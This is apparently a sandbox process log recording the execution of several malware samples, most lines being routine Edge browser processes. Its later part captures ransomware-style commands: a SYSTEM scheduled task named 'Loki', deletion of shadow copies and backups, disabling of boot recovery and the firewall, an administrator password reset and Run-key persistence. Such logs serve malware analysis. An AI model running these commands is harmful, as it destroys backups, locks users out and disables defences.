"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4692,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4888 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4848,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5452 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5476,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5536 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5472,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5544 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5852,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5860 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5852,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5860 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6100,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6460 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6104,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6432 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6084,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6484 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6132,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2936 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=5540,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5140,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5284 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=4904,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5308,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5036 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\" -ad -an -ai#7zMap23165:190:7zEvent4419
C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe
"C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6416,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=7084 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5264,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5024 /prefetch:8
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5076,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6676 /prefetch:8
C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe
"C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"
C:\Windows\system32\pcwrun.exe
C:\Windows\system32\pcwrun.exe "C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe" ContextMenu
C:\Windows\System32\msdt.exe
C:\Windows\System32\msdt.exe -path C:\Windows\diagnostics\index\PCWDiagnostic.xml -af C:\Users\Admin\AppData\Local\Temp\PCWFFB8.xml /skip TRUE
C:\Windows\System32\sdiagnhost.exe
C:\Windows\System32\sdiagnhost.exe -Embedding
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dxajrlbz\dxajrlbz.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES40D.tmp" "c:\Users\Admin\AppData\Local\Temp\dxajrlbz\CSC2575887E8B184585B3B9C44FB5636CE2.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s4sok3ih\s4sok3ih.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES46B.tmp" "c:\Users\Admin\AppData\Local\Temp\s4sok3ih\CSC502B6C4B714E42C08C50A36E9A33D40.TMP"
C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe
"C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6668,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=1248 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=3992,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5796 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=5260,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5796 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5132,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6564 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=896,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4856 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\00acf5d0db7ef50140dae7a3482d9db80704ec98670bd1607e76c99382a4888c\" -ad -an -ai#7zMap24245:190:7zEvent14566
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3460,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=2948,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=1856 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5448,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6592 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=7064,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4880,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6432 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\" -ad -an -ai#7zMap8206:190:7zEvent11735
C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd.exe
"C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd.exe"
C:\Windows\system32\net.exe
"net" session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\README-7ILxnOHKLf.md
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6644,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6708 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3236,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6656 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=5212,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5868 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6596,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6184 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5632,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\" -ad -an -ai#7zMap295:190:7zEvent31045
C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe
"C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5872,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\winlogon.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\winlogon.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2osrakf2\2osrakf2.cmdline"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
C:\ProgramData\winlogon.exe
C:\ProgramData\winlogon.exe
C:\Windows\winlogon.exe
C:\Windows\winlogon.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA1C6.tmp" "c:\ProgramData\CSC8BF11E4749A64B498E688F446F4116AB.TMP"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode mode=disable
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Restore-My-Files.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5396,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6652 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=5716,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=6636,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4344 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5684,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be\" -ad -an -ai#7zMap21156:190:7zEvent32297
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6620,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5024 /prefetch:8
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be.bat" "
C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\system32\net.exe
net user administrator 4217
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator 4217
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Tsuchigumo.bat /d "C:\Windows\system32\Tsuchigumo.bat" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Control Panel\Desktop" /v Wallpaper /f
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
